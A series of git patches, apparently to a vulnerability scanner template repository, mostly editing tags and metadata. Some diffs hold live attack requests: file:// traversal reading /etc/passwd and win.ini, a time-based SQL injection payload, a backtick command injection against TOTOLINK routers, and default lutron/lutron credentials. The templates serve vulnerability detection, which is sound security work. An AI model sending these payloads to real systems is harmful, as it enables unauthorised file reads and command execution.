intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd + tags: misc,generic,sitemap requests: - method: GET path: - "{{BaseURL}}/sitemap.xml" - "{{BaseURL}}/sitemap.xsl" + - "{{BaseURL}}/sitemap.xsd" - host-redirects: true + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +26,11 @@ requests: - "sitemap" case-insensitive: true + - type: word + part: header + words: + - 'application/xml' + - type: status status: - 200 From 3cb432b57f3e50cd4c74ab0aa328ecbea45af6f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 02:12:07 +0530 Subject: [PATCH 1309/1415] windows-path --- cves/2021/CVE-2021-43734.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml index e8347c9cb5..48198c892f 100644 --- a/cves/2021/CVE-2021-43734.yaml +++ b/cves/2021/CVE-2021-43734.yaml @@ -23,12 +23,16 @@ requests: - method: GET path: - "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd" + - "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini" + stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or - type: status status: From 16ad21a7ea453e30a09d36c396844ef64e168d93 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 02:20:22 +0530 Subject: [PATCH 1310/1415] tag added --- cves/2021/CVE-2021-43734.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml index 48198c892f..171404f3ef 100644 --- a/cves/2021/CVE-2021-43734.yaml +++ b/cves/2021/CVE-2021-43734.yaml @@ -17,7 +17,7 @@ info: metadata: shodan-query: http.html:"kkFileView" verified: "true" - tags: cve,cve2021,kkfileview,traversal + tags: cve,cve2021,kkfileview,traversal,lfi requests: - method: GET From e0d87ca98375b81206f5b659053b623e77fad98f Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 15 Dec 2022 17:55:12 -0500 Subject: [PATCH 1311/1415] Update CVE-2020-11110.yaml - Replaced the change-log (dind't have any info regarding CVE-2020-11110) for the pull request to resolve the issue. - Added a HackerOne report using this CVE. --- cves/2020/CVE-2020-11110.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 5ee827da43..389723f1bd 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -7,9 +7,10 @@ info: description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. reference: - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - - https://github.com/grafana/grafana/blob/master/CHANGELOG.md + - https://github.com/grafana/grafana/pull/23254 - https://security.netapp.com/advisory/ntap-20200810-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 + - https://hackerone.com/reports/1329433 remediation: This issue can be resolved by updating Grafana to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N @@ -18,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana + tags: cve,cve2020,xss,grafana,hackerone requests: - raw: From 1611f511333962eb4f2a46d14a9eebb6214f196b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:32:28 +0530 Subject: [PATCH 1312/1415] Update CVE-2020-11110.yaml --- cves/2020/CVE-2020-11110.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 389723f1bd..d2971ae099 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana,hackerone + tags: cve,cve2020,xss,grafana requests: - raw: From b96431c2ace073c4514e820a57a9e31fa1f31088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:38:03 +0530 Subject: [PATCH 1313/1415] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index f18f0c41f9..12ac0b3770 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,28 +11,25 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-4050 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth requests: - raw: - | - @timeout: 10s + @timeout: 15s POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=3' + - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' From 96ada330bd5c7949d4183bc8b7df5f07f6b5b4d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:40:24 +0530 Subject: [PATCH 1314/1415] Update CVE-2018-17422.yaml --- cves/2018/CVE-2018-17422.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index d1a6a87da4..c2e00f77b6 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17422 info: - name: dotCMS <5.0.2 - Open Redirect + name: DotCMS < 5.0.2 - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | @@ -16,8 +16,8 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 metadata: + verified: true shodan-query: http.title:"dotCMS" - verified: "true" tags: cve,cve2018,redirect,dotcms requests: From f9476a88ba49480f83d6c133682a3ac3fe6a901c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:44:07 +0530 Subject: [PATCH 1315/1415] Update lutron-default-login.yaml --- default-logins/lutron/lutron-default-login.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/default-logins/lutron/lutron-default-login.yaml b/default-logins/lutron/lutron-default-login.yaml index a641e5b470..5192be1179 100644 --- a/default-logins/lutron/lutron-default-login.yaml +++ b/default-logins/lutron/lutron-default-login.yaml @@ -7,12 +7,19 @@ info: reference: - https://www.lutron.com - https://vulners.com/openvas/OPENVAS:1361412562310113206 - tags: default-login,iot + tags: default-login,lutron,iot requests: - method: GET path: - - "{{BaseURL}}/login?login=lutron&password=lutron" + - "{{BaseURL}}/login?login={{username}}&password={{password}}" + + attack: pitchfork + payloads: + username: + - lutron + password: + - lutron matchers-condition: and matchers: From 69022e5e23f589b00df65279e26b185518b0940e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:00:29 +0530 Subject: [PATCH 1317/1415] Update vernemq-status-page.yaml --- misconfiguration/vernemq-status-page.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/vernemq-status-page.yaml b/misconfiguration/vernemq-status-page.yaml index 40cea4dbca..fa8daf6149 100644 --- a/misconfiguration/vernemq-status-page.yaml +++ b/misconfiguration/vernemq-status-page.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://github.com/vernemq/vernemq - tags: vernemq,misconfig,status + tags: misconfig,vernemq,status requests: - method: GET @@ -18,7 +18,7 @@ requests: - type: word part: body words: - - 'VerneMQ Status' + - 'VerneMQ' - 'Issues' - 'Cluster Overview' - 'Node Status' From 83f4ae44177b9b112cb4af2352c5530497b2f02d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:05:18 +0530 Subject: [PATCH 1318/1415] Update unauth-zwave-mqtt.yaml --- misconfiguration/unauth-zwave-mqtt.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-zwave-mqtt.yaml b/misconfiguration/unauth-zwave-mqtt.yaml index 2f1f6ca9be..d0829b3681 100644 --- a/misconfiguration/unauth-zwave-mqtt.yaml +++ b/misconfiguration/unauth-zwave-mqtt.yaml @@ -9,7 +9,7 @@ info: metadata: verified: "true" shodan-query: title:"ZWave To MQTT" - tags: zwave,mqtt,health + tags: misconfig,zwave,mqtt,unauth requests: - method: GET From 33d282bdb392e905e2c532a21207430d2f745e5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:08:07 +0530 Subject: [PATCH 1320/1415] Update websheets-config.yaml --- exposures/configs/websheets-config.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/websheets-config.yaml b/exposures/configs/websheets-config.yaml index 348419cabd..5c56d3f69c 100644 --- a/exposures/configs/websheets-config.yaml +++ b/exposures/configs/websheets-config.yaml @@ -6,6 +6,8 @@ info: severity: low reference: - https://github.com/daveagp/websheets + metadata: + verified: true tags: websheets,config,exposure,files requests: From 917b712f9858b97f33d3506267b8a8a0fb94a588 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:09:24 +0530 Subject: [PATCH 1321/1415] Update salesforce-credentials.yaml --- exposures/files/salesforce-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/salesforce-credentials.yaml b/exposures/files/salesforce-credentials.yaml index 30f65b0413..6d0de206ce 100644 --- a/exposures/files/salesforce-credentials.yaml +++ b/exposures/files/salesforce-credentials.yaml @@ -6,7 +6,7 @@ info: severity: unknown reference: - https://github.com/daveagp/websheets - tags: exposure,files,salesforce,disclosure + tags: exposure,files,salesforce requests: - method: GET From 89166203dc58409f31af6f471b2f0f172d05c40a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:12:41 +0530 Subject: [PATCH 1322/1415] Update production-log.yaml --- exposures/logs/production-log.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/exposures/logs/production-log.yaml b/exposures/logs/production-log.yaml index a850457a1b..73a6b54e46 100644 --- a/exposures/logs/production-log.yaml +++ b/exposures/logs/production-log.yaml @@ -7,7 +7,7 @@ info: metadata: verified: "true" github-query: filename:production.log Connecting to database specified by database.yml - tags: exposure,files,logs,disclosure + tags: exposure,files,logs requests: - method: GET @@ -32,10 +32,3 @@ requests: - type: status status: - 200 - - extractors: - - type: regex - name: last_modified - part: header - regex: - - 'Last-Modified:.*' From 3295892e1a560937b98786559118eaef735ec3c8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:31:24 +0530 Subject: [PATCH 1325/1415] Update credential-exposure.yaml --- file/keys/credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 26000e60c2..f0702a1c3c 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -12,7 +12,7 @@ id: credentials-disclosure-file info: name: Credentials Disclosure Check - author: Sy3Omda,geeknik,forgedhallpass + author: Sy3Omda,geeknik,forgedhallpass,ayadi severity: unknown description: Look for multiple keys/tokens/passwords hidden inside of files. tags: exposure,token,file,disclosure From d6689206691f796cafe4b7925408d6bba1f210c7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:41:31 +0530 Subject: [PATCH 1326/1415] Update unauth-lfd-zhttpd.yaml --- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index e2f115ef84..99331b2d7a 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -1,7 +1,7 @@ id: unauth-lfd-zhttpd info: - name: Unauthenticated Local File Disclosure in zhttpd + name: zhttpd - Unauthenticated Local File Disclosure author: EvergreenCartoons severity: high description: | @@ -13,7 +13,7 @@ info: metadata: verified: "true" shodan-query: http.html:"VMG1312-B10D" - tags: misconfig,unauth,zyxel + tags: misconfig,unauth,zyxel,lfi requests: - raw: From b531190857957196840c68b6af19aa3e4a73bed0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:59:36 +0530 Subject: [PATCH 1327/1415] Update spark-panel.yaml --- exposed-panels/spark-panel.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/exposed-panels/spark-panel.yaml b/exposed-panels/spark-panel.yaml index c57248d7b6..bc2ebeffc0 100644 --- a/exposed-panels/spark-panel.yaml +++ b/exposed-panels/spark-panel.yaml @@ -1,16 +1,11 @@ id: spark-panel info: - name: SPARK Panel - Detect + name: SPARK Panel Detect author: righettod severity: info - description: SPARK panel was detected reference: - https://www.hypeinnovation.com - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 metadata: verified: true shodan-query: html:"/apps/IMT/Html/" From 6f14421d8437e714b688c4424ac2222c3212f30e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 09:43:14 +0530 Subject: [PATCH 1328/1415] formatting-changes --- network/detection/mysql-detect.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 5ce90b9d47..17dac858a8 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -1,7 +1,7 @@ id: mysql-detect info: - name: Mysql Detection + name: Mysql Detection author: pussycat0x severity: info description: | @@ -12,14 +12,15 @@ info: tags: network,mysql,db network: - - inputs: - data: "\n" + host: - "{{Hostname}}" - "{{Host}}:3306" + matchers: - type: word words: - "mysql" - condition: and \ No newline at end of file + condition: and From 68d079f98ecde493f22c893545bb2469347d9bbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Dec 2022 06:09:21 +0000 Subject: [PATCH 1329/1415] Auto Generated New Template Addition List [Fri Dec 16 06:09:21 UTC 2022] :robot: --- .new-additions | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/.new-additions b/.new-additions index 29a7f3d958..16323993f7 100644 --- a/.new-additions +++ b/.new-additions @@ -5,8 +5,10 @@ cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml cves/2022/CVE-2022-2314.yaml +cves/2022/CVE-2022-4050.yaml cves/2022/CVE-2022-45917.yaml default-logins/apache/karaf-default-login.yaml +default-logins/lutron/lutron-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/gyra-master-admin.yaml exposed-panels/ilias-panel.yaml @@ -14,21 +16,29 @@ exposed-panels/mag-dashboard-panel.yaml exposed-panels/microfocus-admin-server.yaml exposed-panels/netris-dashboard-panel.yaml exposed-panels/planet-estream-panel.yaml +exposed-panels/spark-panel.yaml exposed-panels/verizon-router-panel.yaml exposures/configs/config-json.yaml exposures/configs/golangci-config.yaml exposures/configs/stestr-config.yaml +exposures/configs/websheets-config.yaml exposures/files/database-credentials.yaml exposures/files/gradle-libs.yaml exposures/files/kubernetes-etcd-keys.yaml exposures/files/routes-ini.yaml +exposures/files/salesforce-credentials.yaml exposures/files/svn-wc-db.yaml exposures/logs/badarg-log.yaml exposures/logs/firebase-debug-log.yaml exposures/logs/npm-debug-log.yaml +exposures/logs/production-log.yaml iot/homeworks-illumination.yaml +miscellaneous/sitemap-detect.yaml misconfiguration/installer/easyscripts-installer.yaml misconfiguration/installer/metaview-explorer-installer.yaml +misconfiguration/unauth-mautic-upgrade.yaml +misconfiguration/unauth-zwave-mqtt.yaml +misconfiguration/vernemq-status-page.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml network/detection/redis-detect.yaml @@ -36,6 +46,7 @@ network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml technologies/icecast-server-detect.yaml +technologies/pagespeed-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml vulnerabilities/vmware/vmware-nsx-stream-rce.yaml From 704b4801aff20091f1403b544aa525cda94ed5ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 12:06:40 +0530 Subject: [PATCH 1330/1415] Update CVE-2022-1595.yaml --- cves/2022/CVE-2022-1595.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 896412bb68..266ae72170 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -1,7 +1,7 @@ id: CVE-2022-1595 info: - name: HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure + name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure author: theamanrawat severity: medium description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/hc-custom-wp-admin-url/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.1 cve-id: CVE-2022-1595 - cwe-id: CWE-200 metadata: verified: "true" - tags: cve,cve2022,wpscan,info-disclosure,wordpress,wp-plugin,hc-custom-wp-admin-url,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth requests: - raw: @@ -32,7 +29,9 @@ requests: part: header regex: - "Location: ([a-zA-Z0-9_.\\/-]+)" + - "wordpress" + condition: and - type: status status: - - 302 \ No newline at end of file + - 302 From f147770a28fbf5552afbfa1d1d258d10d7ea9f47 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 13:53:01 +0530 Subject: [PATCH 1331/1415] Update CVE-2021-41773.yaml --- cves/2021/CVE-2021-41773.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 3dc305a56e..ddf881088d 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -4,7 +4,8 @@ info: name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo,666asd severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + description: | + A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 @@ -12,15 +13,14 @@ info: - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: - shodan-query: apache version:2.4.49 verified: "true" + shodan-query: Apache 2.4.49 tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: @@ -46,7 +46,6 @@ requests: stop-at-first-match: true matchers-condition: or matchers: - - type: regex name: LFI regex: From 5584a179be75384f3247d508b31506e625150ace Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:02:27 +0530 Subject: [PATCH 1332/1415] Update exposed-dockerd.yaml --- network/exposed-dockerd.yaml | 13 +++---------- 1 file changed, 3 insertions(+), 10 deletions(-) diff --git a/network/exposed-dockerd.yaml b/network/exposed-dockerd.yaml index 6dc7e906c5..fc9349d68b 100644 --- a/network/exposed-dockerd.yaml +++ b/network/exposed-dockerd.yaml @@ -4,7 +4,8 @@ info: name: Docker Daemon Exposed author: arafat severity: critical - description: Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. + description: | + Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: verified: true shodan-query: port:2375 product:"docker" @@ -21,12 +22,4 @@ network: matchers: - type: word words: - - "Docker" - - extractors: - - type: regex - regex: - - "Version:([0-9.]+)" - - "Kernel Version:([0-9.]+)" - - "API Version:([0-9.]+)" - - "Container #1:([A-Za-z0-9]+)" + - "Server: Docker" From fe88ffba3d3213c23b50edc54a38fb61ed6f1ff9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:48:12 +0530 Subject: [PATCH 1333/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 86f6c9d801..26c682edd3 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -15,11 +15,14 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot + +variables: + cmd: "`ls>../{{randstr}}`" requests: - raw: - | - GET /cgi-bin/downloadFlile.cgi?payload=`ls>../{{randstr}}` HTTP/1.1 + GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1 Host: {{Hostname}} - | From 85d53faee7cb849bebe980e2ee9b7650c42040fb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:50:35 +0530 Subject: [PATCH 1334/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 26c682edd3..c04cbd40d8 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot - + variables: cmd: "`ls>../{{randstr}}`" From 8a4b0998f56a979b202fccdaf2f5755804facfc7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:10:17 +0530 Subject: [PATCH 1335/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index c04cbd40d8..18a20c7119 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,8 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot - + tags: totolink,cve,cve2022,router,unauth,rce,iot variables: cmd: "`ls>../{{randstr}}`" From 7db26abc42353b0f370a03b8800cb4c38d454669 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:10:43 +0530 Subject: [PATCH 1336/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 18a20c7119..ffde8a0417 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -16,8 +16,7 @@ info: cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot variables: - cmd: "`ls>../{{randstr}}`" - + cmd: "`ls>../{{randstr}}`" requests: - raw: - | From 5ac6fa5d41c36b7106bb6abea586e5436fcb7014 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:15:18 +0530 Subject: [PATCH 1337/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index ffde8a0417..a43e5a1a4d 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,9 +14,11 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot + tags: totolink,cve,cve2022,router,unauth,rce,iot + variables: cmd: "`ls>../{{randstr}}`" + requests: - raw: - | From 2d2f1dcd89c583a7f3591894445067e7cba21a18 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:39:59 +0530 Subject: [PATCH 1338/1415] Update mysql-detect.yaml --- network/detection/mysql-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 17dac858a8..2831a51110 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -23,4 +23,3 @@ network: - type: word words: - "mysql" - condition: and From 363565e9e3512ff17ac6d5f945c1d5c18bb0758f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:41:57 +0530 Subject: [PATCH 1339/1415] fix lint --- network/detection/mysql-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 2831a51110..7cf65233ea 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -21,5 +21,6 @@ network: matchers: - type: word + part: body words: - "mysql" From 58c5340ee278f34678dcc51ad4e7eaf02a957961 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:47:42 +0530 Subject: [PATCH 1340/1415] added case insensitive --- network/detection/mysql-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 7cf65233ea..b3d4b26aa7 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -24,3 +24,4 @@ network: part: body words: - "mysql" + case-insensitive: true From a9a0e8d32b4735b687eac74a71b779e092a8bae2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:53:28 +0530 Subject: [PATCH 1341/1415] Content-Type Update --- cves/2022/CVE-2022-25082.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml 